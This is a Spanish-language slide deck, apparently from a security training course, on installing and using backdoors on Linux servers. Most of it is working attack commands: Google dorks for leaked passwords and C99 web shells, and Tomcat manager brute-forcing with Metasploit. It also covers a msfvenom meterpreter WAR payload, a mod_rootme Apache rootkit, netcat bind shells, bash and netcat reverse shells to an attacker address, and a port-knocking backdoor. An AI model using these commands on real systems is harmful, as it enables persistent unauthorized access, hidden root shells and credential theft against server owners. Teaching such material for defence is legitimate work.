Vous êtes sur la page 1sur 40

Backdoors en

Sistemas Operativos
Instalacin, configuracin y uso
de Backdoors

AGENDA

1.
2.
3.
4.

5.
6.
7.

Quin soy?
Casos de Seguridad Informtica en el Per y el
mundo
Buscando vulnerabilidades backdoors
Qu es un backdoor?
1. Backdoor SETUID
2. Backdoor Mdulo de APACHE
3. Backdoor Bind Shell
4. Backdoor Reverse Shell
5. Backdoor KnockOut
Instalando y configurando backdoors (ejemplos)
Informacin sobre el curso
Conclusiones

AGENDA
1.
2.
3.
4.
5.

6.

Quin soy?
Casos de Seguridad Informtica en el Per y el
mundo
Buscando vulnerabilidades
Qu es un backdoor?
Instalando
y
configurando
backdoors
(ejemplos)
Conclusiones

#whoami

Ing. Sistemas ISO 27001 Lead Auditor, CISM, C|EH,


C)PTE, C)SWAE, C)PEH, ITILv3, C)ISSO, ISO 27002
Instructor Oficial de MILE2
Consultor de Kunak Consulting SAC
http://www.kunak.com.pe
Psiclogo que aun no comienza sus estudios.
Escritor en mis tiempos libres:
http://www.el-palomo.com
Correo electrnico:
omarc320@gmail.com
opalomino@kunak.com.pe
Cuenta de Facebook:

www.facebook.com/El.Palomo.Seguridad.Informacion

AGENDA
1.
2.
3.
4.
5.

6.

Quin soy?
Casos de Seguridad Informtica en el Per y el
mundo
Buscando vulnerabilidades
Qu es un backdoor?
Instalando
y
configurando
backdoors
(ejemplos)
Conclusiones

Quines nos
amenazan?

Y esto.en realidad pasa?

Y esto.en realidad pasa?

Colaboradores Internos 90%

Hackers Independientes 68%

Contratistas o proveedores
66%

Hacktivistas 54%
Fuente E&Y Encuesta Global de Seguridad de Inf.
2014

DEMANDA y OFERTA de Hacking en el Per

Una fuerte OFERTA

Una fuerte OFERTA

Y una ms fuerte DEMANDA

Y una ms fuerte DEMANDA

Y una ms fuerte DEMANDA

Y una ms fuerte DEMANDA

Y una ms fuerte DEMANDA

Y una ms fuerte DEMANDA

Google Dorks para buscar backdoors

site:pastebin.com intext:@gmail.com | @yahoo.com |


@hotmail.com daterange:2457388-2457491
"Password=" inurl:web.config -intext:web.config ext:config
intitle:!C99Shell v. 1.0 site:.pe
filetype:php intext:"!C99Shell v. 1.0 beta
Las personas siempre son los mejores backdoors

AGENDA
1.
2.
3.
4.

5.

Quin soy?
Casos de Seguridad Informtica en el Per y el
mundo
Qu es un backdoor?
Instalando
y
configurando
backdoors
(ejemplos)
Conclusiones

Qu es un Backdoor (puerta trasera)?


Los backdoors son programas
utilizados por los hackers para lograr
acceso a sistemas operativos de
manera rpida y sencilla.
Existen
diferentes
tipos
de
backdoors:
Backdoors en Aplicaciones Web
Backdoors a travs de SETUID
Backdoors en Mdulos de
Servicios
Backdoors del tipo Knocking

AGENDA
1.
2.
3.
4.

5.

Quin soy?
Casos de Seguridad Informtica en el Per y el
mundo
Qu es un backdoor?
Instalando
y
configurando
backdoors
(ejemplos)
Conclusiones

Arquitectura de los Ejemplos


ATACANTE
- Computador desde el cual se
realizarn los ataques
- Sistema Operativo KALI LINUX 2
TARGET
- Servidor TOMCAT vulnerable
- Aqu se instalaran los backdoors
- Sistema Operativo Linux

Direccin IP: 192.168.4.131

Direccin IP: 192.168.4.130

ATACANTE 2
- Computador desde el cual se
explotaran los backdoors
- Sistema Operativo Linux
Direccin IP: 192.168.4.132

Identificar Servicios TOMCAT


Buscamos TOMCAT en la RED LAN
a travs de NMAP
Nmap sV p 8080 sS TARGET
auxiliary/scanner/portscan/syn
Buscamos
TOMCAT/AXIS2
en
INTERNET:
Google Dork:
intitle:"Tomcat Server Administration
intitle:"Axis2 Happiness Page" +ext:jsp

Ahora si . Vamos con los ejemplos

Identificar Vulnerabilidades en TOMCAT


Vamos a utilizar METASPLOIT para identificar
vulnerabilidades:
Root> msfconsole
Root> search tomcat
Root> use auxiliary/scanner/http/tomcat_mgr_login
Root> show options
Root> set RHOSTS 192.168.4.130

Finalmente realizar la carga de un .WAR malicioso


para obtener acceso al sistema operativo.
msfvenom
-p
java/meterpreter/reverse_tcp
LHOST=192.168.4.131 -f war > meterpreter.war
En el cliente:

Msf> use exploit/multi/handler


Msf> set payload java/meterpreter/reverse_tcp

Backdoor con SETUID

De pronto algunos nunca escucharon de los


permisos GETUID, SETUID y STICKY. Pues este
mecanismo de backdoor est asociado a SETUID.

Entonces en que consiste el SETUID?


El SETUID es un bit que permite a las aplicaciones
ejecutarse con los permisos de su propietario. El
concepto puede sonar muy abstracto pero si ponemos
un ejemplo es ms facil entender, vamos a crear un
archivo llamado TEST.C y lo compilamos.

Backdoor con SETUID

Backdoor en Apache Server


Cargamos un mdulo en APACHE de tal
manera que no se realicen cambios a nivel
de cdigo en los aplicativos PHP.
Cuntos administradores de Sistemas
verifican los mdulos cargados en
Apache?
Toca compilar un mdulo de APACHE
llamado ModROOTme.
https://github.com/jingchunzhang/backdoor_ro
otkit/tree/master/mod_rootme-0.4

Backdoor en Apache Server


Comandos en el Sistema Operativo
root>cd mod_rootme-0.4/
root>Make Linux
root> cp mod_rootme2.so /etc/httpd/modules
root> /etc/init.d/httpd reload

En el cliente:
Root> nc 192.168.4.130 80
GET root

Backdoor: BindShell
Las primeras herramientas utilizados
por Hackers fue la navaja suiza
NETCAT.
Una BindShell es un programa
corriendo una SHELL dentro de un
proceso de red.
Una BindShell puede estar escrita en
cualquier lenguaje de programacin.
http://netcat.sourceforge.net/download.
php

Backdoor: Bind Shell


Comandos en el sistema operativo:
root>./configure --enable-DGAPING_SECURITY_HOLE
root>Make
root> cd src/
root> ./netcat -l -p 8443 -e /bin/sh
root> bg
En el CLIENTE:
C:\>nc64.exe 192.168.75.133 8443

Backdoor: Reverse Shell


Tiene el mismo concepto que una
Bind Shell pero realizada de manera
reversa.
Ahora es el servidor quien se
conecta a nuestro cliente. Esta
pensado para poder realizar
bypass de Firewalls.

Backdoor: Reverse Shell


Reverse Shell con BASH
En el cliente:
nc64.exe -l -p 8080 -vvv
En el servidor:
bash -i >& /dev/tcp/192.168.1.34/8080 0>&1

Backdoor: Reverse Shell


Reverse Shell con NETCAT
En el cliente:
nc64.exe -l -p 8080 -vvv
En el servidor:
./netcat -e /bin/sh 192.168.1.34 8080

Backdoor: KnockOut
Knock viene del ingles tocar la
puerta.
Este es un backdoor del tipo
Reverse Shell que pasa
desapercibido.
Slo puede ser accedido por
aquel que conozca la
combinacin de la puerta
correcta.

Backdoor: KnockOut
En el servidor:
Root> $make servidor
Root> ./knock-outd knock-out.conf eth5

En el cliente (atacante):
Root> $make cliente
Root> ./knock-outc 192.168.4.130 knock-out.conf
Root> ./netcat -lv -p 64876

AGENDA
1.
2.
3.
4.

5.
6.

Quin soy?
Casos de Seguridad Informtica en el Per y el
mundo
Qu es un backdoor?
Instalando
y
configurando
backdoors
(ejemplos)
Informacin sobre el curso
Conclusiones

Conclusiones:
- Instalar backdoors es la manera mas sencilla
de acceder a servidor comprometidos.
- Cuando un servidor Linux es comprometido
se recomienda reestablecer un backup ya que
detectar backdoors o rootkits es muy
complicado.

PREGUNTAS?

Vous aimerez peut-être aussi